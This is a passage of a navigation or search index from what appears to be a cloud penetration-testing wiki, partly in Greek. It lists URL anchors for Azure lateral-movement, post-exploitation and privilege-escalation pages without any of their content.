ting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-front-door-afd--afd-waf","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-5","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-application-gateway-και-azure-application-gateway-waf","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#Αριθμητική","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-hub-spoke--vnet-peering","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-6","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#site-to-site-vpn","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-7","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-expressroute","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-8","pentesting-cloud/azure-security/az-permissions-for-a-pentest.html#az---permissions-for-a-pentest","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/index.html#az---lateral-movement-cloud---on-prem","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/index.html#az---lateral-movement-cloud---on-prem-1","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/index.html#on-prem-μηχανές-συνδεδεμένες-στο-cloud","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/index.html#tokens-και-περιορισμοί","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/index.html#Τεχνικές-pivoting","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/index.html#Αναφορές","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/index.html#az-ad-connect---Υβριδική-Ταυτότητα","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/index.html#Βασικές-Πληροφορίες","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.html#az--Συγχρονισμός-Νέων-Χρηστών","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.html#Συγχρονισμός-χρηστών-azuread-στο-on-prem-για-αναβάθμιση-από-on-prem-σε-azuread","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.html#references","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.html#az---default-applications","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.html#az---cloud-kerberos-trust","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.html#basic-information","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.html#trust","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.html#kerberos-tgt","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.html#ntlm","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.html#abusing-cloud-kerberos-trust-to-obtain-domain-admin","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.html#attack-prerequisites","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.html#the-full-attack","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.html#az---federation","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.html#basic-information","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.html#pivoting","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.html#golden-saml","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.html#on-prem---cloud","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.html#Αναφορές","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.html#az---phs---password-hash-sync","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.html#basic-information","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.html#pivoting","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.html#finding-the--azure-ad-connect-server","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.html#Κατάχρηση-msol_","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.html#abusing-sync_","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.html#seamless-sso","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.html#Αναφορές","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.html#az---pta---pass-through-authentication","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.html#basic-information","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.html#authentication-flow","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.html#on-prem---cloud","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.html#cloud---on-prem","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.html#seamless-sso","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.html#Αναφορές","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.html#az---seamless-sso","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.html#basic-information","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.html#on-prem---cloud","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.html#on-prem---cloud-μέσω-resource-based-constrained-delegation","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.html#Αναφορές","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.html#az---arc-ευάλωτο-gpo-deploy-script","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.html#Αναγνώριση-των-Θεμάτων","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.html#Εκμετάλλευση","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.html#Αναφορές","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.html#az---Τοπ-credentials-cloud","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.html#Τοπική-Αποθήκευση-token-και-Σκέψεις-Ασφαλείας","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.html#azure-cli-Διεπαφή-Γραμμής-Εντολών","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.html#azure-powershell","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.html#Αυτόματα-Εργαλεία-για-να-τα-βρείτε","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.html#Συστάσεις-Ασφαλείας","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.html#az---pass-the-cookie","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.html#Γιατί-cookies","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.html#Επίθεση","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.html#Αναφορές","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.html#az---pass-the-certificate","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.html#pass-the-certificate-azure","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.html#Αναφορές","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#az---pass-the-prt","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#Τι-είναι-ένα-prt","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#Έλεγχος-αν-έχετε-ένα-prt","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#prt-cookie","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#Ροή-cookie-prt-χρησιμοποιώντας-tpm","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#Σενάρια-Κατάχρησης-prt","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#Παραδείγματα-Επίθεσης-pass-the-prt","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#Επίθεση---roadtoken","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#Επίθεση---Χρήση-roadrecon","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#Επίθεση---Χρήση-aadinternals-και-ενός-leaked-prt","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#Επίθεση---mimikatz","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#Αναφορές","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.html#az---phishing-primary-refresh-token-microsoft-entra","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.html#az---processes-memory-access-token","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.html#Βασικές-Πληροφορίες","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#az---primary-refresh-token-prt","pentesting-cloud/azure-security/az-post-exploitation/index.html#az---Μετά-την-Εκμετάλλευση","pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.html#az---blob-storage-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.html#storage-privesc","pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.html#microsoftstoragestorageaccountsblobservicescontainersblobsread","pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.html#microsoftstoragestorageaccountsblobservicescontainersblobswrite","pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.html#delete","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#az---cosmosdb-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#cosmosdb-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountsread--microsoftdocumentdbdatabaseaccountswrite","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountssqldatabasescontainersread--microsoftdocumentdbdatabaseaccountssqldatabasescontainerswrite","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountssqldatabaseswrite--microsoftdocumentdbdatabaseaccountssqldatabasesread","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountsfailoverprioritychangeaction","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountsregeneratekeyaction","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountssqldatabasescontainersuserdefinedfunctionswrite--microsoftdocumentdbdatabaseaccountssqldatabasescontainersuserdefinedfunctionsread","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountssqldatabasescontainersstoredprocedureswrite--microsoftdocumentdbdatabaseaccountssqldatabasescontainersstoredproceduresread","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountssqldatabasescontainerstriggerswrite--microsoftdocumentdbdatabaseaccountssqldatabasescontainerstriggersread","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountsmongodbdatabasescollectionsread--microsoftdocumentdbdatabaseaccountsmongodbdatabasescollectionswrite","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountsmongodbdatabaseswrite--microsoftdocumentdbdatabaseaccountsmongodbdatabasesread","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountsmongodbroledefinitionswrite--microsoftdocumentdbdatabaseaccountsmongodbroledefinitionsread","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountsmongodbuserdefinitionswrite--microsoftdocumentdbdatabaseaccountsmongodbuserdefinitionsread","pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.html#az---file-share-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.html#microsoftstoragestorageaccountsfileservicesfilesharesfilesread","pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.html#microsoftstoragestorageaccountsfileservicesfilesharesfileswrite-microsoftstoragestorageaccountsfileserviceswritefilebackupsemanticsaction","pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.html#delete","pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.html#az---function-apps-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.html#funciton-apps-post-exploitaiton","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#az---key-vault-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#azure-key-vault","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultssecretsgetsecretaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultscertificatespurgeaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultskeysencryptaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultskeysdecryptaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultskeyspurgeaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultssecretspurgeaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultssecretssetsecretaction","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultscertificatesdelete","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultskeysdelete","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultssecretsdelete","pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.html#microsoftkeyvaultvaultssecretsrestoreaction","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#az---logic-apps-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#logic-apps-database-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftlogicworkflowsread-microsoftlogicworkflowswrite--microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftwebsitesread-microsoftwebsiteswrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftwebsitesstopaction-microsoftwebsitesstartaction--microsoftwebsitesrestartaction","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftwebsitesconfiglistaction-microsoftwebsitesread--microsoftwebsitesconfigwrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftlogicintegrationaccountswrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftresourcessubscriptionsresourcegroupsread--microsoftlogicintegrationaccountsbatchconfigurationswrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftresourcessubscriptionsresourcegroupsread--microsoftlogicintegrationaccountsmapswrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftresourcessubscriptionsresourcegroupsread--microsoftlogicintegrationaccountspartnerswrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#microsoftresourcessubscriptionsresourcegroupsread--microsoftlogicintegrationaccountssessionswrite","pentesting-cloud/azure-security/az-post-exploitation/az-logic-apps-post-exploitation.html#delete","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#az---mysql-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#mysql-database-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversdatabaseswrite--microsoftdbformysqlflexibleserversdatabasesread","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversbackupswrite","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversadvancedthreatprotectionsettingswrite","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversfirewallruleswrite","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversresetgtidaction","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversupdateconfigurationsaction","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversread-microsoftdbformysqlflexibleserverswrite--microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversstopaction","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#microsoftdbformysqlflexibleserversstartaction","pentesting-cloud/azure-security/az-post-exploitation/az-mysql-post-exploitation.html#delete","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#az---postgresql-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#postgresql-database-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversdatabaseswrite--microsoftdbforpostgresqlflexibleserversdatabasesread","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversbackupswrite","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversadvancedthreatprotectionsettingswrite--microsoftdbforpostgresqlflexibleserversadvancedthreatprotectionsettingsread","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversfirewallruleswrite-microsoftdbforpostgresqlflexibleserversread--microsoftdbforpostgresqlflexibleserversfirewallrulesread","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversconfigurationswrite--microsoftdbforpostgresqlflexibleserversconfigurationsread","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversstopaction","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversstartaction","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#microsoftdbforpostgresqlflexibleserversread-microsoftdbforpostgresqlflexibleserverswrite--microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-post-exploitation/az-postgresql-post-exploitation.html#delete","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#az---queue-storage-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#queue","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesread","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesprocessaction","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesaddaction","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessageswrite","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#actions-microsoftstoragestorageaccountsqueueservicesqueuesdelete","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#dataactions-microsoftstoragestorageaccountsqueueservicesqueuesmessagesdelete","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#actions-microsoftstoragestorageaccountsqueueservicesqueueswrite","pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.html#Αναφορές","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#az---service-bus-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#service-bus","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#actions-microsoftservicebusnamespacesdelete","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#Ενέργειες-microsoftservicebusnamespacestopicsdelete","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#Ενέργειες-microsoftservicebusnamespacesqueuesdelete","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#Ενέργειες-microsoftservicebusnamespacestopicssubscriptionsdelete","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#actions-microsoftservicebusnamespaceswrite--microsoftservicebusnamespacesread","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#Ενέργειες-microsoftservicebusnamespacesqueueswrite-microsoftservicebusnamespacesqueuesread","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#Ενέργειες-microsoftservicebusnamespacestopicswrite-microsoftservicebusnamespacestopicsread","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#Ενέργειες-microsoftservicebusnamespacestopicssubscriptionswrite-microsoftservicebusnamespacestopicssubscriptionsread","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#Ενέργειες-authorizationrules-Αποστολή--Λήψη-Μηνυμάτων","pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.html#Αναφορές","pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.html#az---table-storage-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.html#table-storage-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.html#microsoftstoragestorageaccountstableservicestablesentitiesread","pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.html#microsoftstoragestorageaccountstableservicestablesentitieswrite--microsoftstoragestorageaccountstableservicestablesentitiesaddaction--microsoftstoragestorageaccountstableservicestablesentitiesupdateaction","pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.html#delete","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#az---sql-database-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#sql-database-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserversdatabasesread-microsoftsqlserversread--microsoftsqlserversdatabaseswrite","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserverselasticpoolswrite--microsoftsqlserverselasticpoolsread","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserversauditingsettingsread--microsoftsqlserversauditingsettingswrite","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqllocationsconnectionpoliciesazureasyncoperationread-microsoftsqlserversconnectionpoliciesread--microsoftsqlserversconnectionpolicieswrite","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserversdatabasesexportaction","pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.html#microsoftsqlserversdatabasesimportaction","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#az---vms--network-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#vms--network","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#vm-application-pivoting","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#Ευαίσθητες-πληροφορίες-σε-εικόνες","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#Ευαίσθητες-πληροφορίες-σε-σημεία-επαναφοράς","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#Ευαίσθητες-πληροφορίες-σε-δίσκους--στιγμιότυπα","pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.html#Ευαίσθητες-πληροφορίες-σε-vm-extensions--vm-applications","pentesting-cloud/azure-security/az-privilege-escalation/index.html#az---privilege-escalation","pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.html#az---azure-iam-privesc-authorization","pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.html#azure-iam","pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.html#microsoftauthorizationroleassignmentswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.html#microsoftauthorizationroledefinitionswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.html#microsoftauthorizationelevateaccessaction","pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.html#microsoftmanagedidentityuserassignedidentitiesfederatedidentitycredentialswrite","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#az---app-services-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#app-services","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#microsoftwebsitespublishaction-microsoftwebsitesbasicpublishingcredentialspoliciesread-microsoftwebsitesconfigread-microsoftwebsitesread","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#obtaining-scm-credentials--enabling-basic-authentication","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#publish-code-using-scm-credentials","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#webjobs-microsoftwebsitespublishaction--scm-credentials","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#microsoftwebsiteswrite-microsoftwebsitesread-microsoftmanagedidentityuserassignedidentitiesassignaction","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#microsoftwebsitesconfiglistaction","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#read-configured-third-party-credentials","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#update-app-code-from-the-source","pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.html#microsoftwebsitesconfigwrite-microsoftwebsitesconfigread-microsoftwebsitesconfiglistaction-microsoftwebsitesread","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#az---azure-automation-accounts-privesc","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#azure-automation-accounts","pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.html#hybrid-workers-group","pentesting-cloud/azure-se